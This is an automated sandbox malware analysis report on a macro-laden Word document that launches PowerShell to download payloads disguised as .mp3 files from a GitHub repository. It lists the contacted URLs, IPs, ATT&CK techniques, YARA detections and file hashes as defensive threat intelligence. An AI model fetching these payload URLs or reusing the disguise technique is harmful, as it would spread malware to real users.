Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: powershell.exe, 00000001.00000002.418333433.000000000028E000.00000004.00000020.sdmp | Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Command and Scripting Interpreter1 | Path Interception | Process Injection1 | Masquerading1 | OS Credential Dumping | Security Software Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scripting22 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Modify Registry1 | LSASS Memory | Process Discovery1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | Exploitation for Client Execution13 | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion21 | Security Account Manager | Virtualization/Sandbox Evasion21 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | PowerShell1 | Logon Script (Mac) | Logon Script (Mac) | Process Injection1 | NTDS | Remote System Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol3 | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting22 | LSA Secrets | File and Directory Discovery2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | System Information Discovery12 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features

Behavior Graph

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label | Link
RfORrHIRNe.doc | 49% | Virustotal | | Browse
RfORrHIRNe.doc | 100% | Avira | HEUR/Macro.Agent |
RfORrHIRNe.doc | 100% | Joe Sandbox ML | |

Dropped Files

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Temp\~DFA094A62AA4BA8959.TMP | 100% | Avira | HEUR/Macro.Downloader.MRQR.Gen |
C:\Users\user\AppData\Local\Temp\~DFA094A62AA4BA8959.TMP | 100% | Joe Sandbox ML | |

Unpacked PE Files

No Antivirus matches

Domains

Source | Detection | Scanner | Label | Link
raw.githubusercontent.com | 0% | Virustotal | | Browse

URLs

Source | Detection | Scanner | Label | Link
http://github.co | 0% | Virustotal | | Browse
http://github.co | 0% | Avira URL Cloud | safe |
https://render.githubusercontent.com | 0% | Avira URL Cloud | safe |
http://ocsp.entrust.net03 | 0% | URL Reputation | safe |
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | URL Reputation | safe |
http://www.diginotar.nl/cps/pkioverheid0 | 0% | URL Reputation | safe |
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe |
https://raw.githubusercontent.com/ssbb36/stv/main/5.mp3 | 0% | Avira URL Cloud | safe |
https://raw.githubuserco | 0% | Avira URL Cloud | safe |
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | 0% | URL Reputation | safe |
http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe |
https://notebooks.githubusercontent.com | 0% | Avira URL Cloud | safe |
https://raw.githubusercontent.com | 0% | Avira URL Cloud | safe |
https://viewscreen.githubusercontent.com | 0% | Avira URL Cloud | safe |
http://www.%s.comPA | 0% | URL Reputation | safe |
https://github.c | 0% | Avira URL Cloud | safe |
http://ocsp.entrust.net0D | 0% | URL Reputation | safe |

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
github.com | 140.82.121.3 | true | false | | high
raw.githubusercontent.com | 185.199.108.133 | true | false | | unknown

    Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
https://raw.githubusercontent.com/ssbb36/stv/main/5.mp3 | false | Avira URL Cloud: safe | unknown
https://github.com/ssbb36/stv/raw/main/5.mp3 | false | | high
http://github.com/ssbb36/stv/raw/main/5.mp3 | false | | high

        URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://github.co | powershell.exe, 00000001.00000002.422084505.0000000003603000.00000004.00000001.sdmp | true | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://www.windows.com/pctv. | powershell.exe, 00000001.00000002.424943589.000000001CCD0000.00000002.00020000.sdmp | false | | high
http://investor.msn.com | powershell.exe, 00000001.00000002.424943589.000000001CCD0000.00000002.00020000.sdmp | false | | high
http://www.msnbc.com/news/ticker.txt | powershell.exe, 00000001.00000002.424943589.000000001CCD0000.00000002.00020000.sdmp | false | | high
https://render.githubusercontent.com | powershell.exe, 00000001.00000002.422212636.00000000036F7000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/ssbb36/stv/ra | powershell.exe, 00000001.00000002.422212636.00000000036F7000.00000004.00000001.sdmp | false | | high
http://crl.entrust.net/server1.crl0 | powershell.exe, 00000001.00000002.424530325.000000001B80C000.00000004.00000001.sdmp | false | | high
http://github.com/ssbb36/stv/raw | powershell.exe, 00000001.00000002.422084505.0000000003603000.00000004.00000001.sdmp, powershell.exe, 00000001.00000002.422212636.00000000036F7000.00000004.00000001.sdmp | false | | high
http://ocsp.entrust.net03 | powershell.exe, 00000001.00000002.424530325.000000001B80C000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://github.com | powershell.exe, 00000001.00000002.419847899.0000000002CAF000.00000004.00000001.sdmp | false | | high
https://github.com/ssbb36/stv/raw/main/1.mp3PE | powershell.exe, 00000001.00000002.419847899.0000000002CAF000.00000004.00000001.sdmp | false | | high
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | powershell.exe, 00000001.00000002.424530325.000000001B80C000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://github.com/ssbb36/stv/raw/main/4.mp3PE | powershell.exe, 00000001.00000002.419847899.0000000002CAF000.00000004.00000001.sdmp | false | | high
http://www.diginotar.nl/cps/pkioverheid0 | powershell.exe, 00000001.00000002.424530325.000000001B80C000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://github.com/ssbb36/stv/raw/main/2.mp3 | powershell.exe, 00000001.00000002.422212636.00000000036F7000.00000004.00000001.sdmp | false | | high
https://github.com/ssbb3 | powershell.exe, 00000001.00000002.422212636.00000000036F7000.00000004.00000001.sdmp | false | | high
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | powershell.exe, 00000001.00000002.425190058.000000001CEB7000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
http://www.hotmail.com/oe | powershell.exe, 00000001.00000002.424943589.000000001CCD0000.00000002.00020000.sdmp | false | | high
http://github.com/ssbb36/stv/raw/main/3.mp3 | powershell.exe, 00000001.00000002.422212636.00000000036F7000.00000004.00000001.sdmp | false | | high
https://raw.githubuserco | powershell.exe, 00000001.00000002.422212636.00000000036F7000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | powershell.exe, 00000001.00000002.425190058.000000001CEB7000.00000002.00020000.sdmp | false | | high
http://github.com | powershell.exe, 00000001.00000002.422084505.0000000003603000.00000004.00000001.sdmp | false | | high
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | powershell.exe, 00000001.00000002.424530325.000000001B80C000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.icra.org/vocabulary/. | powershell.exe, 00000001.00000002.425190058.000000001CEB7000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
https://notebooks.githubusercontent.com | powershell.exe, 00000001.00000002.422212636.00000000036F7000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | powershell.exe, 00000001.00000002.418738530.0000000002360000.00000002.00020000.sdmp | false | | high
http://github.com/ssbb36/stv/raw/main/2.mp3PE | powershell.exe, 00000001.00000002.419847899.0000000002CAF000.00000004.00000001.sdmp | false | | high
https://raw.githubusercontent.com | powershell.exe, 00000001.00000002.419847899.0000000002CAF000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://github.com/ssbb36 | powershell.exe, 00000001.00000002.422084505.0000000003603000.00000004.00000001.sdmp | false | | high
http://github.com/ssbb36/stv/raw/main/4.mp3 | powershell.exe, 00000001.00000002.422212636.00000000036F7000.00000004.00000001.sdmp | false | | high
http://investor.msn.com/ | powershell.exe, 00000001.00000002.424943589.000000001CCD0000.00000002.00020000.sdmp | false | | high
https://viewscreen.githubusercontent.com | powershell.exe, 00000001.00000002.422212636.00000000036F7000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://github.com/ssbb36/stv/raw/main/5.mp3PE | powershell.exe, 00000001.00000002.419847899.0000000002CAF000.00000004.00000001.sdmp | false | | high
http://www.%s.comPA | powershell.exe, 00000001.00000002.418738530.0000000002360000.00000002.00020000.sdmp | false | URL Reputation: safe | low
https://github.c | powershell.exe, 00000001.00000002.422212636.00000000036F7000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://github.com/ssbb36/stv/raw/main/3.mp3PE | powershell.exe, 00000001.00000002.419847899.0000000002CAF000.00000004.00000001.sdmp | false | | high
http://ocsp.entrust.net0D | powershell.exe, 00000001.00000002.424530325.000000001B80C000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://github.com/ssbb36/stv/raw/main/1.mp3 | powershell.exe, 00000001.00000002.422212636.00000000036F7000.00000004.00000001.sdmp | false | | high
https://secure.comodo.com/CPS0 | powershell.exe, 00000001.00000002.424530325.000000001B80C000.00000004.00000001.sdmp | false | | high
http://crl.entrust.net/2048ca.crl0 | powershell.exe, 00000001.00000002.424530325.000000001B80C000.00000004.00000001.sdmp | false | | high
http://www.piriform.com/ccleanerhttp://wT | powershell.exe, 00000001.00000002.418333433.000000000028E000.00000004.00000020.sdmp | false | | high

Contacted IPs

Legend (share of contacted IPs):

• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs

Public

IP | Domain | Country | Flag | ASN | ASN Name | Malicious
185.199.108.133 | raw.githubusercontent.com | Netherlands | | 54113 | FASTLYUS | false
140.82.121.3 | github.com | United States | | 36459 | GITHUBUS | false

General Information

Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 515215
Start date: 04.11.2021
Start time: 01:48:56
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 6m 11s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: RfORrHIRNe (renamed file extension from none to doc)
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 4
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• GSI enabled (VBA)
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal88.expl.winDOC@3/10@3/2
EGA Information: Failed
HDC Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): WMIADAP.exe, conhost.exe
• Execution Graph export aborted for target powershell.exe, PID 2432 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtQueryAttributesFile calls found

                                                            Simulations

                                                            Behavior and APIs

Time | Type | Description
01:49:19 | API Interceptor | 42x Sleep call for process: powershell.exe modified

                                                            Joe Sandbox View / Context

                                                            IPs

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
185.199.108.133 | 8p0O2OJPcE.exe | Get hash | malicious | Browse |
| Statement_125858.doc | Get hash | malicious | Browse |
| MZ7EuvQ9IB.exe | Get hash | malicious | Browse |
| zvUd7VPOfS.exe | Get hash | malicious | Browse |
| ip ddos.exe | Get hash | malicious | Browse |
| Ambrosial.exe | Get hash | malicious | Browse |
| hwid.exe | Get hash | malicious | Browse |
| fm3FU6sW77.exe | Get hash | malicious | Browse |
| AY5uCs0HrY.exe | Get hash | malicious | Browse |
| Pv9fSenm0V.exe | Get hash | malicious | Browse |
| t63ouMqJ8f.exe | Get hash | malicious | Browse |
| gnykCySWj5.exe | Get hash | malicious | Browse |
| YRbcV0B6TZ.exe | Get hash | malicious | Browse |
| KpDtm40Lne.exe | Get hash | malicious | Browse |
| 6oi3E5jdTR.exe | Get hash | malicious | Browse |
| Software patch by Silensix.exe | Get hash | malicious | Browse |
| 7D4B1B72B1318CB933E0D6420813499581064F57A713B.exe | Get hash | malicious | Browse |
| j1XcBWNHwh.exe | Get hash | malicious | Browse |
| mxZECDzIFz.exe | Get hash | malicious | Browse |
| p3IJWYfJZw.exe | Get hash | malicious | Browse |
140.82.121.3 | 8p0O2OJPcE.exe | Get hash | malicious | Browse |
| zvUd7VPOfS.exe | Get hash | malicious | Browse |
| Incoming_Wire_payment_returned120 ___vaw.jar | Get hash | malicious | Browse |
| fm3FU6sW77.exe | Get hash | malicious | Browse |
| AY5uCs0HrY.exe | Get hash | malicious | Browse |
| Hgny9xwmj6.exe | Get hash | malicious | Browse |
| Pv9fSenm0V.exe | Get hash | malicious | Browse |
| pq9FtcL817.exe | Get hash | malicious | Browse |
| gnykCySWj5.exe | Get hash | malicious | Browse |
| KpDtm40Lne.exe | Get hash | malicious | Browse |
| 6oi3E5jdTR.exe | Get hash | malicious | Browse |
| Software patch by Silensix.exe | Get hash | malicious | Browse |
| mxZECDzIFz.exe | Get hash | malicious | Browse |
| Contract and PI signed.jar | Get hash | malicious | Browse |
| Contract and PI signed .jar | Get hash | malicious | Browse |
| p3IJWYfJZw.exe | Get hash | malicious | Browse |
| Genshin Hack v2.0.exe | Get hash | malicious | Browse |
| paket..jar | Get hash | malicious | Browse |
| paket..jar | Get hash | malicious | Browse |
| JwCS2tlN78.exe | Get hash | malicious | Browse |

Domains

Associated Sample Name / URL | Detection | Context

Match: github.com
  8p0O2OJPcE.exe | malicious | 140.82.121.3
  PO-011121.jar | malicious | 140.82.121.4
  iedRCXBuxs.exe | malicious | 140.82.121.4
  MZ7EuvQ9IB.exe | malicious | 140.82.121.4
  zvUd7VPOfS.exe | malicious | 140.82.121.3
  hwid.exe | malicious | 140.82.121.4
  Invoice Overdue_C0809-H03.xls.exe | malicious | 140.82.121.4
  1S3cLXtFN2.exe | malicious | 140.82.121.4
  RdCWJ3MAGz.exe | malicious | 140.82.121.4
  INVOICE.jar | malicious | 140.82.121.4
  Md0q201V1D.exe | malicious | 140.82.121.4
  plf5v18Xds.exe | malicious | 140.82.121.3
  Incoming_Wire_payment_returned120 ___vaw.jar | malicious | 140.82.121.4
  fm3FU6sW77.exe | malicious | 140.82.121.4
  AY5uCs0HrY.exe | malicious | 140.82.121.3
  Hgny9xwmj6.exe | malicious | 140.82.121.3
  Pv9fSenm0V.exe | malicious | 140.82.121.3
  t63ouMqJ8f.exe | malicious | 140.82.121.4
  pq9FtcL817.exe | malicious | 140.82.121.3
  gnykCySWj5.exe | malicious | 140.82.121.4

ASN

Associated Sample Name / URL | Detection | Context

Match: GITHUBUS
  8p0O2OJPcE.exe | malicious | 140.82.121.3
  PO-011121.jar | malicious | 140.82.121.4
  iedRCXBuxs.exe | malicious | 140.82.121.4
  MZ7EuvQ9IB.exe | malicious | 140.82.121.4
  zvUd7VPOfS.exe | malicious | 140.82.121.3
  hwid.exe | malicious | 140.82.121.4
  Invoice Overdue_C0809-H03.xls.exe | malicious | 140.82.121.4
  RdCWJ3MAGz.exe | malicious | 140.82.121.4
  INVOICE.jar | malicious | 140.82.121.4
  Md0q201V1D.exe | malicious | 140.82.121.4
  Incoming_Wire_payment_returned120 ___vaw.jar | malicious | 140.82.121.4
  fm3FU6sW77.exe | malicious | 140.82.121.4
  AY5uCs0HrY.exe | malicious | 140.82.121.4
  Hgny9xwmj6.exe | malicious | 140.82.121.3
  Pv9fSenm0V.exe | malicious | 140.82.121.3
  t63ouMqJ8f.exe | malicious | 140.82.121.4
  pq9FtcL817.exe | malicious | 140.82.121.3
  gnykCySWj5.exe | malicious | 140.82.121.4
  YRbcV0B6TZ.exe | malicious | 140.82.121.4
  KpDtm40Lne.exe | malicious | 140.82.121.3

Match: FASTLYUS
  NtxIAL7Vqi.dll | malicious | 151.101.1.108
  SecuriteInfo.com.W64.Bzrloader.IEldorado.25041.dll | malicious | 151.101.1.44
  #Ud83d#Udd0a VM 9193407283.wav.html | malicious | 151.101.1.229
  8p0O2OJPcE.exe | malicious | 185.199.108.133
  DELAY NOTICE - WAN HAI 261 S321 - SO 3110.exe | malicious | 151.101.1.211
  Order_10112021 40200 p.m..html | malicious | 151.101.1.229
  Oh49Bck5BV.exe | malicious | 151.101.194.199
  Documents_photos.html | malicious | 151.101.112.193
  nEVkwpjXlu.apk | malicious | 151.101.2.137
  SOA OCT-NOV 2021.exe | malicious | 151.101.1.211
  Statement_125858.doc | malicious | 185.199.108.133
  cs.exe | malicious | 151.101.1.164
  mipsel | malicious | 167.82.53.249
  6575DHL_6757.exe | malicious | 185.199.108.153
  PO-011121.jar | malicious | 199.232.192.209
  iedRCXBuxs.exe | malicious | 185.199.110.133
  MZ7EuvQ9IB.exe | malicious | 185.199.108.133
  zvUd7VPOfS.exe | malicious | 185.199.108.133
  dork.exe | malicious | 151.101.1.44
  ip ddos.exe | malicious | 185.199.108.133

JA3 Fingerprints

Associated Sample Name / URL | Detection | Context

Match: 05af1f5ca1b87cc9cc9b25185115607d
  IMPORTS INVOICE.doc | malicious | 185.199.108.133, 140.82.121.3
  Purchase Order NO_0184930.doc | malicious | 185.199.108.133, 140.82.121.3
  BL_DOCUMENT.xlsx | malicious | 185.199.108.133, 140.82.121.3
  Order-135078.xlsb | malicious | 185.199.108.133, 140.82.121.3
  Bill_630781.xlsb | malicious | 185.199.108.133, 140.82.121.3
  Purchase Order PO03112021STK.docx | malicious | 185.199.108.133, 140.82.121.3
  Payment 846725.xlsb | malicious | 185.199.108.133, 140.82.121.3
  inv-16731.xlsb | malicious | 185.199.108.133, 140.82.121.3
  Purchase Order PO03112021STK.docx | malicious | 185.199.108.133, 140.82.121.3
  INV 683068.xlsb | malicious | 185.199.108.133, 140.82.121.3
  Payment-4091.xlsb | malicious | 185.199.108.133, 140.82.121.3
  Bill.61566.xlsb | malicious | 185.199.108.133, 140.82.121.3
  inv-53639.xlsb | malicious | 185.199.108.133, 140.82.121.3
  INV.738108.xlsb | malicious | 185.199.108.133, 140.82.121.3
  Order.48868.xlsb | malicious | 185.199.108.133, 140.82.121.3
  inv.030976.xlsb | malicious | 185.199.108.133, 140.82.121.3
  INV 362996.xlsb | malicious | 185.199.108.133, 140.82.121.3
  Copy of Quote_ref-05550.xlsm | malicious | 185.199.108.133, 140.82.121.3
  RFQ - 0211.docx | malicious | 185.199.108.133, 140.82.121.3
  Bill-8593.xlsb | malicious | 185.199.108.133, 140.82.121.3

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{28D4A0D4-699A-4F69-8702-D3F95AC65D58}.tmp
  Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
  File Type: Composite Document File V2 Document, Cannot read section info
  Category: dropped
  Size (bytes): 11264
  Entropy (8bit): 3.966590766878462
  Encrypted: false
  SSDEEP: 96:Dzytv5uI73NUcen6nsQrBfqDf0C6PkKb1vC+X0jkbA6jwqgW6aajix2:DGtTryl6ke1N0jksS5a
  MD5: C8FF60850F690001E24A0F8E375A7758
  SHA1: 6FA7FEB96E006EBFD84E2EE0F76A0372EB782B7C
  SHA-256: 423719EA0CE3C206B853B3EFC92F9A068C517C0BF929A9834D1924B44E7D8AA0
  SHA-512: 843B8AAFA3085E7AAB03710432F07A3BD7BC4C1514BAAA9C72DCDC2A8D623DB9D0945DF01C4005AE7496A1B0E861279CE5538D35899855EB9C3E3CE425D955FA
  Malicious: false
                                                                                                                                            Yara Hits:
                                                                                                                                            • Rule: PowerShell_in_Word_Doc, Description: Detects a powershell and bypass keyword in a Word document, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{28D4A0D4-699A-4F69-8702-D3F95AC65D58}.tmp, Author: Florian Roth
                                                                                                                                            • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{28D4A0D4-699A-4F69-8702-D3F95AC65D58}.tmp, Author: Florian Roth
                                                                                                                                            Reputation:low
                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{BC62BE70-F984-485F-A938-51B492D77752}.tmp
                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1024
                                                                                                                                            Entropy (8bit):0.05390218305374581
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:ol3lYdn:4Wn
                                                                                                                                            MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                                                            SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                                                            SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                                                            SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:high, very likely benign file
                                                                                                                                            C:\Users\user\AppData\Local\Temp\~DF2453EC8FFE1D14DF.TMP
                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):512
                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3::
                                                                                                                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                                            C:\Users\user\AppData\Local\Temp\~DFA094A62AA4BA8959.TMP
                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                            Category:modified
                                                                                                                                            Size (bytes):27136
                                                                                                                                            Entropy (8bit):3.9846371270993712
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:va0WaUj+Ar/AhnGVN+Q9SaW/X0jhAtnezRpzJxGHZ:35Gyz/WRpzJs
                                                                                                                                            MD5:301129EF743494B2099BBC422B355C89
                                                                                                                                            SHA1:1332AD20AF54D9ECB475D33F8030297A123B3F22
                                                                                                                                            SHA-256:F41633365C2073B1D2AE47889F34DA492FA21FF32A3E4E4A393C83732E672778
                                                                                                                                            SHA-512:4B300477A8F370146AD56AB27BD5F92B9D00BDD8B717FD4025FEE6C6EA7674ABA5678200B800B7AA66C879EA7199FFA5C9A823E8FE47C45DCC46DAF77AB02886
                                                                                                                                            Malicious:true
                                                                                                                                            Yara Hits:
                                                                                                                                            • Rule: PowerShell_in_Word_Doc, Description: Detects a powershell and bypass keyword in a Word document, Source: C:\Users\user\AppData\Local\Temp\~DFA094A62AA4BA8959.TMP, Author: Florian Roth
                                                                                                                                            • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: C:\Users\user\AppData\Local\Temp\~DFA094A62AA4BA8959.TMP, Author: Florian Roth
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                            Reputation:low
                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\RfORrHIRNe.LNK
                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Nov 4 07:49:11 2021, mtime=Thu Nov 4 07:49:11 2021, atime=Thu Nov 4 07:49:15 2021, length=39936, window=hide
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1014
                                                                                                                                            Entropy (8bit):4.530334739432499
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:8j2nFgXg/XAlCPCHaXjByB//iX+WqcQ3flIicvbInJJlEDtZ3YilMMEpxRljKyT8:8j2b/XTTck67eEnlEDv3q3Qd7Qy
                                                                                                                                            MD5:563776B34A33F432F754E14CD0C811BC
                                                                                                                                            SHA1:467467EF57A6D838836835D5725D38E72FE49DAF
                                                                                                                                            SHA-256:BF65957F29E0D67AFCDD2F6FCBCB57879057E0313C152BC00F422395C4717AC1
                                                                                                                                            SHA-512:E36BFF43CB5926BC47DAFFAA7B1E3239002C4291C8F95BEE161ABD890938968C53B8D0EC3E4AE1065C06A72CB3C4880EC3165D3F4A2FE2CBD9D94B5A11D48AD3
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):71
                                                                                                                                            Entropy (8bit):4.5549224798255485
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:bDuMJlvQ9sm2mX1esm2v:bCkurUrI
                                                                                                                                            MD5:8DC46D624D55247F3AFCDF57A59AD13A
                                                                                                                                            SHA1:8AF5CE5B75E603C633DF82EBED33186753FB52BC
                                                                                                                                            SHA-256:903B82AD8418567C1F8EB0127EA8A86876D3C8CC86C10D1606B4D6CC7F82F2B8
